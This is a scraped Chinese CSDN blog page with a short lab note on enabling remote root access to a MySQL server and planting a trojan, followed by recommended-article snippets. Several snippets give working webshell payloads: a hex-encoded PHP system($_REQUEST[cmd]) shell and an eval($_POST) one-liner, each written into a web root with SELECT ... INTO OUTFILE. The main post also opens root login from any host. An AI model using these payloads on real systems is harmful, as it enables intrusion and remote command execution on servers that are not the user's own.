MySQL远程连接+植入木马获取权限

最新推荐文章于 2024-02-09 22:30:46 发布
最新推荐文章于 2024-02-09 22:30:46 发布
阅读量115 收藏 1
点赞数
分类专栏: 渗透 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NSQ0207/article/details/132100114
版权

主机MySQL连接虚拟机MySQL,链接失败则虚拟机MySQL执行下面语句开启远程连接

更新用户表:

update user set host = '%' where user = 'root'; 

强制刷新权限: 

 flush privileges;

主机MySQL执行语句,查看是否为NULL,如果是则在虚拟机里配置文件

SHOW VARIABLES LIKE "secure_file_priv";

 为NULL在虚拟机里面配置

 查看绝对路径

 在主机的mysql里面执行

 写入成功

 查看是否成功执行木马

 

 

Serein_NSQ
关注
专栏目录
[网络安全自学篇] 九十.远控木马详解及APT攻击中的远控和防御
杨秀璋的专栏
07-24 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了软件来源分析,结合APT攻击中常见的判断方法,利用Python调用扩展包进行溯源。这篇文章将详细分享远控木马及APT攻击中的远控,包括木马的基本概念和分类、木马植入方式、远控木马的通信方式、APT攻击与远控木马等。作者之前分享了多篇木马的文章,但这篇更多是讲解远控型木马,基础性文章,希望对您有所帮助~
[网络安全自学篇] 九十四.《Windows黑客编程技术详解》之提权技术(令牌权限提升和Bypass UAC)
热门推荐
杨秀璋的专栏
09-12 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充相关知识点。第六篇文章主要介绍木马病毒提权技术,包括进程访问令牌权限提升和Bypass UAC,希望对您有所帮助。
复现mysql 备份上传木马,并用shell工具连接操作
weixin_64655821的博客
08-25 357
复现mysql 备份上传木马,并用shell工具连接操作
mysql 木马_用Mysql语句来生成后门木马方案
weixin_42509847的博客
01-25 303
下面的文章主要是介绍又如何通过MySQL(和PHP搭配之***组合) 的Mysql语句来生成后门木马的具体操作方法!以下的文章主要是通过相关代码的方式来引出Mysql语句生成后门木马的具体操作方案。SELECT*FROM`vbb_strikes`WHERE1unionselect2,3,0x3C3F7068702073797374656D28245F524551554553545B...
通过mysql植入木马_通过Mysql的语句生成后门木马的方法_MySQL
weixin_42515339的博客
01-25 160
通过Mysql 的语句生成后门木马的方法!SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'通过M...
mysql插入木马_运用Mysql语句生成后门木马的具体方法_mysql
weixin_42316952的博客
01-27 321
通过mysql 的语句生成后门木马的方法:以下为引用的内容:SELECT * FROM `vbb_strikes` WHERE 1 union select2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3Efrom vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd....
mysql木马_用Mysql语句生成后门木马的具体方法
weixin_42456372的博客
02-08 140
通过Mysql 的语句生成后门木马的方法:SELECT * FROM `vbb_strikes` WHERE 1 union select2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3Efrom vbb_strikes into outfile "c:/inetpub/wwwroot/cmd.php"通过Mys...
mysql后门_Mysql提权留后门
weixin_33303537的博客
01-18 511
记录一次关于无聊时对基友MYSQL服务器的提权攻击。尽管没有完全攻击到对方,并且没有清理痕迹,但是,这里写写简单的防御方式。0x01.从无聊的nmap扫描开始今晚无聊时候,本想打开电脑扫下谁连进我wifi,无意间,眼睛一亮看到了一个惊喜。看到80端口,就有种冲动想要进去,进去后发现forbidden,然后试了试 phpmyadmin,发现直接进去,因为基友用的XAMPP集成环境,一下就猜到空密码。...
服务器木马怎么处理
网站安全资讯
07-01 1601
近日,某一客户网站服务器被入侵,导致服务器植入木马病毒,重做系统也于事无补,目前客户网站处于瘫痪状态,损失较大,通过朋友介绍找到我们SINE安全公司,我们立即成立安全应急处理小组,针对客户服务器被攻击,被黑的情况进行全面的安全检测与防护部署。记录一下我们整个的安全处理过程,教大家该如何防止服务器被攻击,如何解决服务器被入侵的问题。 首先我们来确认下客户的服务器,使用的是linux cent...
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 012-网络安全应急技术与实践(Web层-SQL注入)
最新发布
时光隧道
02-09 7万+
Web层攻击分析与应急响应演练是指对Web应用程序进行攻击分析,发现潜在的漏洞和安全威胁,并在发生安全事件时能够迅速做出应急响应措施的过程。进行Web层攻击分析是为了了解Web应用程序存在的弱点和漏洞,从而提前对其进行修复和加固。攻击分析可以包括对Web应用程序进行安全扫描、漏洞评估和渗透测试等活动,通过模拟真实攻击场景,发现可能被黑客利用的漏洞,如SQL注入、跨站点脚本攻击(XSS)、跨站点请求伪造(CSRF)等。攻击分析的目的是为了及早发现和修复潜在的安全问题,确保Web应用程序的安全性。
MySQL注入之木马上传拿webshell
Jim的博客
08-15 1万+
原理:利用MySQL中的写命令into outfile(固定式:select A into outfile B),在目标Web虚拟路径D:/WWW/下面生成一个木马文件  工具:中国菜刀 1.首先查找SQL注入点 使用单引号'报错,使用and 1=1页面正常和and 1=2页面不正常,来判断存在SQL注入 2.使用order by猜测字段数量 ?id=1+order+by+2--+
mysql写入木马getshell总结
orange777
02-25 5541
1、select into outfile写入木马 2、SQL语句利用日志写shell 3、sqlmap写入一句话getshell
mysql 木马_通过mysql写入一句话木马
weixin_34641420的博客
01-27 1894
USEmysql;# MySQL 返回的查询结果为空(即零行)。# MySQL 返回的查询结果为空(即零行)。CREATE TABLEa(cmd1text NOT NULL);# MySQL 返回的查询结果为空(即零行)。# MySQL 返回的查询结果为空(即零行)。INSERT INTOa( cmd1 )VALUES('');# 影响列数:1# 影响列数:1SELECTcmd1FROMaINTO...
浅谈MySQL导出一句话木马拿WebShell的方法-只需要一句SQL
gscaiyucheng的专栏
02-28 9969
昨天看一篇文章中说到MySQL导出一句话木马拿WebShell的方法。   文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行):   Drop TABLE IF EXISTS temp; //如果存在temp就删掉   Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段   Insert INT
mysql写入一句话木马
Websec
07-16 1万+
前提: root权限,知道了服务器的web的绝对路径,尝试写入一句话 mysql查询语句执行:select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D:\Wamp\2.php" 注意事项: 1、绝对路径的猜解 2、INTO OUTFILE 后面的"D:\Wamp\2.php",有的时候需要变成“D:\\Wamp\\2.ph...
Mysql注入上传木马提权
Jim的博客
09-13 1167
上传暗月大马
通过Mysql 的语句生成后门木马的方法
青春奋斗
07-15 960
SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile c:/inetpub/wwwroot/cmd.php通过Mysql 的注入或者在 phpmyad
XAMPP远程连接MySQL教程:配置与权限设置详解
本文将详细介绍如何在XAMPP上设置允许MySQL服务的远程连接,并修改phpMyAdmin的配置以适应这种需求。 首先,了解XAMPP(Apache、MySQL、PHP集成环境)默认情况下是不提供远程连接功能的,因为出于安全考虑,它在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值